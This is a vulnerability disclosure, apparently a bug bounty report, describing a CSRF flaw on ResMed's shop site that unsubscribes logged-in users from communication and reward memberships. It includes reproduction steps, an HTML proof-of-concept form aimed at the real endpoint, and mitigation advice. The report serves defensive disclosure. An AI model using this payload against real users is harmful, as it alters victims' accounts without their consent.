ResMed: [shop.resmed.com]CSRF leads to Unsubscribe victim from Communication and Reward Membership

Hello, Team
While testing on your main domain I discovered CSRF Attack which lead to unsubscribe victims from Communication/Reward Membership. This more like in-depth security issue with reasonable attack scenario.

Description:
It is possible to unsubscribe a logged-in user from any subscribed events. The unsubscribe is done by a GET-call, which is (of course) not protected by an anti-CSRF token. It would be very easy to make an attack page including all events and unsubscribe all users. The same CSRF html code can also be used to subscribe and unsubscribe all users from your specific activities.

Steps To Reproduce:

1. User should be logged in to https://shop.resmed.com/
2. Go to your profile you will find Communication and Reward Memberships, intercept the request of unsubscribe
3. Generate the CSRF PoC of this endpoint https://shop.resmed.com/GB/en/my-account/update-subscriptions
4. User should visit a page with the following HTML (for example, triggering the GET in any way is good enough):

<html>

<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=“https://shop.resmed.com/GB/en/my-account/update-subscriptions”>
<input type=“hidden” name=“changeType” value=“changeNewsletterSubscription” />
<input type=“submit” value=“Submit request” />
</form>
</body>
</html>

5. User is unsubscribed from the specific activities.

Mitigation:
Do not use the GET-method for any operation that changes something. Next, add an anti-forgery token as is present everywhere on the site.

Supporting Material/References:
#https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Please free to ask , if you need PoC video and I think the step to reproduced is enough for reproducing the issue.

Regards,
Pranav_PranayX01

Impact

Attacker can able to unsubscribe the Victim from communication and Reward Memberships